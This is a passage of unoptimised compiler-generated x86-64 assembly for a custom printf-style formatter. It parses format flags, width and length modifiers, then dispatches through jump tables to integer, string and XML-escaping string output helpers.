movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
je LBB3_101
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rax
movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $37, %eax
je LBB3_4
## %bb.3: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq -24(%rbp), %rcx
movslq -40(%rbp), %rdx
movb (%rcx,%rdx), %cl
movq -16(%rbp), %rsi
movsbl %cl, %edi
callq *%rax
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB3_100
LBB3_4: ## in Loop: Header=BB3_1 Depth=1
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
movq -24(%rbp), %rax
movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
jne LBB3_6
## %bb.5:
jmp LBB3_101
LBB3_6: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rax
movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $37, %eax
jne LBB3_8
## %bb.7: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq -16(%rbp), %rsi
movl $37, %edi
callq *%rax
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB3_100
LBB3_8: ## in Loop: Header=BB3_1 Depth=1
movl $0, -44(%rbp)
movl $0, -52(%rbp)
movl $0, -48(%rbp)
LBB3_9: ## Parent Loop BB3_1 Depth=1
## => This Inner Loop Header: Depth=2
movq -24(%rbp), %rax
movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %eax
addl $-35, %eax
movl %eax, %ecx
movq %rcx, -80(%rbp) ## 8-byte Spill
subl $13, %eax
ja LBB3_15
## %bb.102: ## in Loop: Header=BB3_9 Depth=2
movq -80(%rbp), %rax ## 8-byte Reload
leaq LJTI3_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB3_10: ## in Loop: Header=BB3_9 Depth=2
movl -44(%rbp), %eax
orl $8, %eax
movl %eax, -44(%rbp)
jmp LBB3_16
LBB3_11: ## in Loop: Header=BB3_9 Depth=2
movl -44(%rbp), %eax
orl $16, %eax
movl %eax, -44(%rbp)
jmp LBB3_16
LBB3_12: ## in Loop: Header=BB3_9 Depth=2
movl -44(%rbp), %eax
orl $4, %eax
movl %eax, -44(%rbp)
jmp LBB3_16
LBB3_13: ## in Loop: Header=BB3_9 Depth=2
movl -44(%rbp), %eax
orl $2, %eax
movl %eax, -44(%rbp)
jmp LBB3_16
LBB3_14: ## in Loop: Header=BB3_9 Depth=2
movl -44(%rbp), %eax
orl $32, %eax
movl %eax, -44(%rbp)
jmp LBB3_16
LBB3_15: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_17
LBB3_16: ## in Loop: Header=BB3_9 Depth=2
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
jmp LBB3_9
LBB3_17: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_18
LBB3_18: ## Parent Loop BB3_1 Depth=1
## => This Inner Loop Header: Depth=2
movq -24(%rbp), %rax
movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $48, %ecx
movb %al, -81(%rbp) ## 1-byte Spill
jl LBB3_20
## %bb.19: ## in Loop: Header=BB3_18 Depth=2
movq -24(%rbp), %rax
movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $57, %eax
setle %al
movb %al, -81(%rbp) ## 1-byte Spill
LBB3_20: ## in Loop: Header=BB3_18 Depth=2
movb -81(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB3_21
jmp LBB3_22
LBB3_21: ## in Loop: Header=BB3_18 Depth=2
imull $10, -48(%rbp), %eax
movl %eax, -48(%rbp)
movq -24(%rbp), %rax
movl -40(%rbp), %ecx
movl %ecx, %edx
addl $1, %edx
movl %edx, -40(%rbp)
movslq %ecx, %rcx
movsbl (%rax,%rcx), %eax
subl $48, %eax
addl -48(%rbp), %eax
movl %eax, -48(%rbp)
jmp LBB3_18
LBB3_22: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_23
LBB3_23: ## Parent Loop BB3_1 Depth=1
## => This Inner Loop Header: Depth=2
movq -24(%rbp), %rax
movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $108, %eax
jne LBB3_25
## %bb.24: ## in Loop: Header=BB3_23 Depth=2
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB3_23
LBB3_25: ## in Loop: Header=BB3_1 Depth=1
xorl %eax, %eax
cmpl -52(%rbp), %eax
jne LBB3_27
## %bb.26: ## in Loop: Header=BB3_1 Depth=1
movb $0, -53(%rbp)
jmp LBB3_31
LBB3_27: ## in Loop: Header=BB3_1 Depth=1
movl $1, %eax
cmpl -52(%rbp), %eax
jne LBB3_29
## %bb.28: ## in Loop: Header=BB3_1 Depth=1
movb $1, -53(%rbp)
jmp LBB3_30
LBB3_29: ## in Loop: Header=BB3_1 Depth=1
movb $1, -53(%rbp)
LBB3_30: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_31
LBB3_31: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rax
movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %eax
addl $-83, %eax
movl %eax, %ecx
movq %rcx, -96(%rbp) ## 8-byte Spill
subl $37, %eax
ja LBB3_98
## %bb.103: ## in Loop: Header=BB3_1 Depth=1
movq -96(%rbp), %rax ## 8-byte Reload
leaq LJTI3_1(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB3_32: ## in Loop: Header=BB3_1 Depth=1
movl -44(%rbp), %eax
andl $32, %eax
cmpl $0, %eax
je LBB3_34
## %bb.33: ## in Loop: Header=BB3_1 Depth=1
movl -36(%rbp), %eax
addl $2, %eax
movl %eax, -36(%rbp)
movq -8(%rbp), %rax
movq -16(%rbp), %rsi
movl $48, %edi
callq *%rax
LBB3_34: ## in Loop: Header=BB3_1 Depth=1
cmpb $0, -53(%rbp)
je LBB3_39
## %bb.35: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq %rax, -136(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
movq %rax, -128(%rbp) ## 8-byte Spill
movl -44(%rbp), %eax
movl %eax, -120(%rbp) ## 4-byte Spill
movl -48(%rbp), %eax
movl %eax, -116(%rbp) ## 4-byte Spill
movq -32(%rbp), %rax
movq %rax, -112(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -100(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_37
## %bb.36: ## in Loop: Header=BB3_1 Depth=1
movq -112(%rbp), %rcx ## 8-byte Reload
movl -100(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -144(%rbp) ## 8-byte Spill
jmp LBB3_38
LBB3_37: ## in Loop: Header=BB3_1 Depth=1
movq -112(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -144(%rbp) ## 8-byte Spill
LBB3_38: ## in Loop: Header=BB3_1 Depth=1
movl -116(%rbp), %r8d ## 4-byte Reload
movl -120(%rbp), %edx ## 4-byte Reload
movq -128(%rbp), %rsi ## 8-byte Reload
movq -136(%rbp), %rdi ## 8-byte Reload
movq -144(%rbp), %rax ## 8-byte Reload
movq (%rax), %rax
movl $8, %ecx
xorl %r9d, %r9d
movq %rax, (%rsp)
callq _myvprintf_int64
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
jmp LBB3_43
LBB3_39: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq %rax, -184(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
movq %rax, -176(%rbp) ## 8-byte Spill
movl -44(%rbp), %eax
movl %eax, -168(%rbp) ## 4-byte Spill
movl -48(%rbp), %eax
movl %eax, -164(%rbp) ## 4-byte Spill
movq -32(%rbp), %rax
movq %rax, -160(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -148(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_41
## %bb.40: ## in Loop: Header=BB3_1 Depth=1
movq -160(%rbp), %rcx ## 8-byte Reload
movl -148(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -192(%rbp) ## 8-byte Spill
jmp LBB3_42
LBB3_41: ## in Loop: Header=BB3_1 Depth=1
movq -160(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -192(%rbp) ## 8-byte Spill
LBB3_42: ## in Loop: Header=BB3_1 Depth=1
movl -164(%rbp), %r8d ## 4-byte Reload
movl -168(%rbp), %edx ## 4-byte Reload
movq -176(%rbp), %rsi ## 8-byte Reload
movq -184(%rbp), %rdi ## 8-byte Reload
movq -192(%rbp), %rax ## 8-byte Reload
movl (%rax), %eax
## kill: def $rax killed $eax
movl $8, %ecx
xorl %r9d, %r9d
movq %rax, (%rsp)
callq _myvprintf_int64
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
LBB3_43: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_99
LBB3_44: ## in Loop: Header=BB3_1 Depth=1
movl -44(%rbp), %eax
orl $1, %eax
movl %eax, -44(%rbp)
cmpb $0, -53(%rbp)
je LBB3_49
## %bb.45: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq %rax, -232(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
movq %rax, -224(%rbp) ## 8-byte Spill
movl -44(%rbp), %eax
movl %eax, -216(%rbp) ## 4-byte Spill
movl -48(%rbp), %eax
movl %eax, -212(%rbp) ## 4-byte Spill
movq -32(%rbp), %rax
movq %rax, -208(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -196(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_47
## %bb.46: ## in Loop: Header=BB3_1 Depth=1
movq -208(%rbp), %rcx ## 8-byte Reload
movl -196(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -240(%rbp) ## 8-byte Spill
jmp LBB3_48
LBB3_47: ## in Loop: Header=BB3_1 Depth=1
movq -208(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -240(%rbp) ## 8-byte Spill
LBB3_48: ## in Loop: Header=BB3_1 Depth=1
movl -212(%rbp), %r8d ## 4-byte Reload
movl -216(%rbp), %edx ## 4-byte Reload
movq -224(%rbp), %rsi ## 8-byte Reload
movq -232(%rbp), %rdi ## 8-byte Reload
movq -240(%rbp), %rax ## 8-byte Reload
movq (%rax), %rax
movl $10, %ecx
xorl %r9d, %r9d
movq %rax, (%rsp)
callq _myvprintf_int64
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
jmp LBB3_53
LBB3_49: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq %rax, -280(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
movq %rax, -272(%rbp) ## 8-byte Spill
movl -44(%rbp), %eax
movl %eax, -264(%rbp) ## 4-byte Spill
movl -48(%rbp), %eax
movl %eax, -260(%rbp) ## 4-byte Spill
movq -32(%rbp), %rax
movq %rax, -256(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -244(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_51
## %bb.50: ## in Loop: Header=BB3_1 Depth=1
movq -256(%rbp), %rcx ## 8-byte Reload
movl -244(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -288(%rbp) ## 8-byte Spill
jmp LBB3_52
LBB3_51: ## in Loop: Header=BB3_1 Depth=1
movq -256(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -288(%rbp) ## 8-byte Spill
LBB3_52: ## in Loop: Header=BB3_1 Depth=1
movl -260(%rbp), %r8d ## 4-byte Reload
movl -264(%rbp), %edx ## 4-byte Reload
movq -272(%rbp), %rsi ## 8-byte Reload
movq -280(%rbp), %rdi ## 8-byte Reload
movq -288(%rbp), %rax ## 8-byte Reload
movslq (%rax), %rax
movl $10, %ecx
xorl %r9d, %r9d
movq %rax, (%rsp)
callq _myvprintf_int64
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
LBB3_53: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_99
LBB3_54: ## in Loop: Header=BB3_1 Depth=1
cmpb $0, -53(%rbp)
je LBB3_59
## %bb.55: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq %rax, -328(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
movq %rax, -320(%rbp) ## 8-byte Spill
movl -44(%rbp), %eax
movl %eax, -312(%rbp) ## 4-byte Spill
movl -48(%rbp), %eax
movl %eax, -308(%rbp) ## 4-byte Spill
movq -32(%rbp), %rax
movq %rax, -304(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -292(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_57
## %bb.56: ## in Loop: Header=BB3_1 Depth=1
movq -304(%rbp), %rcx ## 8-byte Reload
movl -292(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -336(%rbp) ## 8-byte Spill
jmp LBB3_58
LBB3_57: ## in Loop: Header=BB3_1 Depth=1
movq -304(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -336(%rbp) ## 8-byte Spill
LBB3_58: ## in Loop: Header=BB3_1 Depth=1
movl -308(%rbp), %r8d ## 4-byte Reload
movl -312(%rbp), %edx ## 4-byte Reload
movq -320(%rbp), %rsi ## 8-byte Reload
movq -328(%rbp), %rdi ## 8-byte Reload
movq -336(%rbp), %rax ## 8-byte Reload
movq (%rax), %rax
movl $10, %ecx
xorl %r9d, %r9d
movq %rax, (%rsp)
callq _myvprintf_int64
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
jmp LBB3_63
LBB3_59: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq %rax, -376(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
movq %rax, -368(%rbp) ## 8-byte Spill
movl -44(%rbp), %eax
movl %eax, -360(%rbp) ## 4-byte Spill
movl -48(%rbp), %eax
movl %eax, -356(%rbp) ## 4-byte Spill
movq -32(%rbp), %rax
movq %rax, -352(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -340(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_61
## %bb.60: ## in Loop: Header=BB3_1 Depth=1
movq -352(%rbp), %rcx ## 8-byte Reload
movl -340(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -384(%rbp) ## 8-byte Spill
jmp LBB3_62
LBB3_61: ## in Loop: Header=BB3_1 Depth=1
movq -352(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -384(%rbp) ## 8-byte Spill
LBB3_62: ## in Loop: Header=BB3_1 Depth=1
movl -356(%rbp), %r8d ## 4-byte Reload
movl -360(%rbp), %edx ## 4-byte Reload
movq -368(%rbp), %rsi ## 8-byte Reload
movq -376(%rbp), %rdi ## 8-byte Reload
movq -384(%rbp), %rax ## 8-byte Reload
movl (%rax), %eax
## kill: def $rax killed $eax
movl $10, %ecx
xorl %r9d, %r9d
movq %rax, (%rsp)
callq _myvprintf_int64
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
LBB3_63: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_99
LBB3_64: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rax
movl -40(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movsbl (%rax,%rcx), %eax
cmpl $83, %eax
jne LBB3_71
## %bb.65: ## in Loop: Header=BB3_1 Depth=1
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
movq -32(%rbp), %rax
movq %rax, -400(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -388(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_67
## %bb.66: ## in Loop: Header=BB3_1 Depth=1
movq -400(%rbp), %rcx ## 8-byte Reload
movl -388(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -408(%rbp) ## 8-byte Spill
jmp LBB3_68
LBB3_67: ## in Loop: Header=BB3_1 Depth=1
movq -400(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -408(%rbp) ## 8-byte Spill
LBB3_68: ## in Loop: Header=BB3_1 Depth=1
movq -408(%rbp), %rax ## 8-byte Reload
movq (%rax), %rax
movq %rax, -64(%rbp)
cmpq $0, -64(%rbp)
jne LBB3_70
## %bb.69: ## in Loop: Header=BB3_1 Depth=1
leaq L_.str(%rip), %rax
movq %rax, -64(%rbp)
LBB3_70: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rdi
movq -16(%rbp), %rsi
movq -64(%rbp), %rdx
callq _myvprintf_str_XML_simplistic
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
jmp LBB3_75
LBB3_71: ## in Loop: Header=BB3_1 Depth=1
movl -36(%rbp), %eax
addl $2, %eax
movl %eax, -36(%rbp)
movq -8(%rbp), %rax
movq -16(%rbp), %rsi
movl $48, %edi
callq *%rax
movq -8(%rbp), %rax
movq -16(%rbp), %rsi
movl $120, %edi
callq *%rax
movq -8(%rbp), %rax
movq %rax, -448(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
movq %rax, -440(%rbp) ## 8-byte Spill
movl -44(%rbp), %eax
movl %eax, -432(%rbp) ## 4-byte Spill
movl -48(%rbp), %eax
movl %eax, -428(%rbp) ## 4-byte Spill
movq -32(%rbp), %rax
movq %rax, -424(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -412(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_73
## %bb.72: ## in Loop: Header=BB3_1 Depth=1
movq -424(%rbp), %rcx ## 8-byte Reload
movl -412(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -456(%rbp) ## 8-byte Spill
jmp LBB3_74
LBB3_73: ## in Loop: Header=BB3_1 Depth=1
movq -424(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -456(%rbp) ## 8-byte Spill
LBB3_74: ## in Loop: Header=BB3_1 Depth=1
movl -428(%rbp), %r8d ## 4-byte Reload
movl -432(%rbp), %edx ## 4-byte Reload
movq -440(%rbp), %rsi ## 8-byte Reload
movq -448(%rbp), %rdi ## 8-byte Reload
movq -456(%rbp), %rax ## 8-byte Reload
movq (%rax), %rax
movl $16, %ecx
movl $1, %r9d
movq %rax, (%rsp)
callq _myvprintf_int64
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
LBB3_75: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_99
LBB3_76: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rax
movslq -40(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $88, %eax
sete %al
andb $1, %al
movzbl %al, %edi
callq _toBool
movb %al, -54(%rbp)
movl -44(%rbp), %eax
andl $32, %eax
cmpl $0, %eax
je LBB3_78
## %bb.77: ## in Loop: Header=BB3_1 Depth=1
movl -36(%rbp), %eax
addl $2, %eax
movl %eax, -36(%rbp)
movq -8(%rbp), %rax
movq -16(%rbp), %rsi
movl $48, %edi
callq *%rax
movq -8(%rbp), %rax
movq -16(%rbp), %rsi
movl $120, %edi
callq *%rax
LBB3_78: ## in Loop: Header=BB3_1 Depth=1
cmpb $0, -53(%rbp)
je LBB3_83
## %bb.79: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq %rax, -504(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
movq %rax, -496(%rbp) ## 8-byte Spill
movl -44(%rbp), %eax
movl %eax, -484(%rbp) ## 4-byte Spill
movl -48(%rbp), %eax
movl %eax, -480(%rbp) ## 4-byte Spill
movb -54(%rbp), %al
movb %al, -473(%rbp) ## 1-byte Spill
movq -32(%rbp), %rax
movq %rax, -472(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -460(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_81
## %bb.80: ## in Loop: Header=BB3_1 Depth=1
movq -472(%rbp), %rcx ## 8-byte Reload
movl -460(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -512(%rbp) ## 8-byte Spill
jmp LBB3_82
LBB3_81: ## in Loop: Header=BB3_1 Depth=1
movq -472(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -512(%rbp) ## 8-byte Spill
LBB3_82: ## in Loop: Header=BB3_1 Depth=1
movb -473(%rbp), %r9b ## 1-byte Reload
movl -480(%rbp), %r8d ## 4-byte Reload
movl -484(%rbp), %edx ## 4-byte Reload
movq -496(%rbp), %rsi ## 8-byte Reload
movq -504(%rbp), %rdi ## 8-byte Reload
movq -512(%rbp), %rax ## 8-byte Reload
movq (%rax), %rax
movl $16, %ecx
movzbl %r9b, %r9d
movq %rax, (%rsp)
callq _myvprintf_int64
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
jmp LBB3_87
LBB3_83: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rax
movq %rax, -560(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
movq %rax, -552(%rbp) ## 8-byte Spill
movl -44(%rbp), %eax
movl %eax, -540(%rbp) ## 4-byte Spill
movl -48(%rbp), %eax
movl %eax, -536(%rbp) ## 4-byte Spill
movb -54(%rbp), %al
movb %al, -529(%rbp) ## 1-byte Spill
movq -32(%rbp), %rax
movq %rax, -528(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -516(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_85
## %bb.84: ## in Loop: Header=BB3_1 Depth=1
movq -528(%rbp), %rcx ## 8-byte Reload
movl -516(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -568(%rbp) ## 8-byte Spill
jmp LBB3_86
LBB3_85: ## in Loop: Header=BB3_1 Depth=1
movq -528(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -568(%rbp) ## 8-byte Spill
LBB3_86: ## in Loop: Header=BB3_1 Depth=1
movb -529(%rbp), %r9b ## 1-byte Reload
movl -536(%rbp), %r8d ## 4-byte Reload
movl -540(%rbp), %edx ## 4-byte Reload
movq -552(%rbp), %rsi ## 8-byte Reload
movq -560(%rbp), %rdi ## 8-byte Reload
movq -568(%rbp), %rax ## 8-byte Reload
movl (%rax), %eax
## kill: def $rax killed $eax
movl $16, %ecx
movzbl %r9b, %r9d
movq %rax, (%rsp)
callq _myvprintf_int64
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
LBB3_87: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_99
LBB3_88: ## in Loop: Header=BB3_1 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
movq -8(%rbp), %rax
movq %rax, -592(%rbp) ## 8-byte Spill
movq -32(%rbp), %rax
movq %rax, -584(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -572(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_90
## %bb.89: ## in Loop: Header=BB3_1 Depth=1
movq -584(%rbp), %rcx ## 8-byte Reload
movl -572(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -600(%rbp) ## 8-byte Spill
jmp LBB3_91
LBB3_90: ## in Loop: Header=BB3_1 Depth=1
movq -584(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -600(%rbp) ## 8-byte Spill
LBB3_91: ## in Loop: Header=BB3_1 Depth=1
movq -592(%rbp), %rax ## 8-byte Reload
movq -600(%rbp), %rcx ## 8-byte Reload
movl (%rcx), %ecx
## kill: def $cl killed $cl killed $ecx
movq -16(%rbp), %rsi
movsbl %cl, %edi
callq *%rax
jmp LBB3_99
LBB3_92: ## in Loop: Header=BB3_1 Depth=1
movq -32(%rbp), %rax
movq %rax, -616(%rbp) ## 8-byte Spill
movl (%rax), %eax
movl %eax, -604(%rbp) ## 4-byte Spill
cmpl $40, %eax
ja LBB3_94
## %bb.93: ## in Loop: Header=BB3_1 Depth=1
movq -616(%rbp), %rcx ## 8-byte Reload
movl -604(%rbp), %edx ## 4-byte Reload
movslq %edx, %rax
addq 16(%rcx), %rax
addl $8, %edx
movl %edx, (%rcx)
movq %rax, -624(%rbp) ## 8-byte Spill
jmp LBB3_95
LBB3_94: ## in Loop: Header=BB3_1 Depth=1
movq -616(%rbp), %rcx ## 8-byte Reload
movq 8(%rcx), %rax
movq %rax, %rdx
addq $8, %rdx
movq %rdx, 8(%rcx)
movq %rax, -624(%rbp) ## 8-byte Spill
LBB3_95: ## in Loop: Header=BB3_1 Depth=1
movq -624(%rbp), %rax ## 8-byte Reload
movq (%rax), %rax
movq %rax, -72(%rbp)
cmpq $0, -72(%rbp)
jne LBB3_97
## %bb.96: ## in Loop: Header=BB3_1 Depth=1
leaq L_.str(%rip), %rax
movq %rax, -72(%rbp)
LBB3_97: ## in Loop: Header=BB3_1 Depth=1
movq -8(%rbp), %rdi
movq -16(%rbp), %rsi
movl -44(%rbp), %edx
movl -48(%rbp), %ecx
movq -72(%rbp), %r8
movq -24(%rbp), %rax
movslq -40(%rbp), %r9
movsbl (%rax,%r9), %eax
cmpl $83, %eax
sete %al
andb $1, %al
movzbl %al, %eax
## kill: def $al killed $al killed $eax
movzbl %al, %r9d
callq _myvprintf_str
addl -36(%rbp), %eax
movl %eax, -36(%rbp)
jmp LBB3_99
LBB3_98: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_99
LBB3_99: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_100
LBB3_100: ## in Loop: Header=BB3_1 Depth=1
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
jmp LBB3_1
LBB3_101:
movl -36(%rbp), %eax
addq $640, %rsp ## imm = 0x280
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L3_0_set_14, LBB3_14-LJTI3_0
.set L3_0_set_15, LBB3_15-LJTI3_0
.set L3_0_set_11, LBB3_11-LJTI3_0
.set L3_0_set_10, LBB3_10-LJTI3_0
.set L3_0_set_12, LBB3_12-LJTI3_0
.set L3_0_set_13, LBB3_13-LJTI3_0
LJTI3_0:
.long L3_0_set_14
.long L3_0_set_15
.long L3_0_set_15
.long L3_0_set_15
.long L3_0_set_11
.long L3_0_set_10
.long L3_0_set_15
.long L3_0_set_15
.long L3_0_set_15
.long L3_0_set_11
.long L3_0_set_12
.long L3_0_set_15
.long L3_0_set_15
.long L3_0_set_13
.set L3_1_set_92, LBB3_92-LJTI3_1
.set L3_1_set_98, LBB3_98-LJTI3_1
.set L3_1_set_76, LBB3_76-LJTI3_1
.set L3_1_set_88, LBB3_88-LJTI3_1
.set L3_1_set_44, LBB3_44-LJTI3_1
.set L3_1_set_32, LBB3_32-LJTI3_1
.set L3_1_set_64, LBB3_64-LJTI3_1
.set L3_1_set_54, LBB3_54-LJTI3_1
LJTI3_1:
.long L3_1_set_92
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_76
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_88
.long L3_1_set_44
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_98
